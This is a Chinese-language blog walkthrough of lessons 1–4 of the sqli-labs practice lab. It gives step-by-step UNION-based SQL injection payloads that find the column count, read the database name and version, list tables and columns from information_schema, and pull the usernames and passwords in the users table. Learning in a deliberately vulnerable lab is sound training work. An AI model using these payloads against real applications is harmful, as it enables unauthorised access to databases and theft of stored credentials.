sqli-labs-master通关(持续更新...)

Less-1 GET-Eeeor based-single quotes -String

(GET型基于错误的单引号字符型注入)

1.输入单引号,页面报错,爆出sql语句,考虑字符型(单引号)注入。

2.判断主查询列数, order by 4报错,order by 3 正常,可以判断存在3列。 

?id=1 order by 4%23

 3.判断占位符,2,3为显示位置,就在这里进行注入。

4. 查询数据库库名和数据库版本号。

?id=-1' union select 1,database(),version()%23

 5.查询数据库的表名。

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23

6. 查询字段名。

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23

7.查询字段下的内容信息。

?id=-1' union select 1,group_concat(username),group_concat(password) from users%23

Less-2 GET-Eeeor based-Intiger based

(GET型数字注入)

从题目中已经知道是数字型注入了:

1.order by判断主查询列数,order by 4报错,order by 3 正常,可以判断存在3列。

?id=2 order by 4#

2.判断占位情况,也就是哪个位置会显示查询的语句,就在这里进行注入。可以看到图中2、3可以看到,选择在这两个位置进行注入。

?id=-2 union select 1,2,3#

3.union联合查询数据库的库名和数据库版本。

补充:在MySQL(5.0)之后的版本就有information_shcema表了。

           table.schema(数据库) column.table(表列) table.name(表名) group_concat(查询所有)

?id=-2 union select 1,database(),version()#

4.union联合查询数据的表名。

?id=-2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'#

 5.union联合查询users表下的字段名。

?id=-2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'#

 6.获取用户信息,查字段username和password。

?id=-2 union select 1,group_concat(username),group_concat(password) from users#

Less-3 GET-Eeeor based-Single quotes with twist-String

1.通过测试可以知道是字符型注入,使用')报错。

 2.使用 order by查询主查询列数。order by3正常,order by4异常,可以判断4列

3.判断显示位,为2和3。 

4.联合查询数据库库名和版本。

 5.查询数据库下的表名。

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23

 6.查询users表的字段名。

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23

7.查询字段password和username。

?id=-1') union select 1,group_concat(username),group_concat(password) from users %23

 Less-4 GET-Eeeor based-Double Quotes -String

1.判断是字符型注入,")爆出SQL语句。

 除了闭合不同,其他的与上面注入一致。

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小谷要努力~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值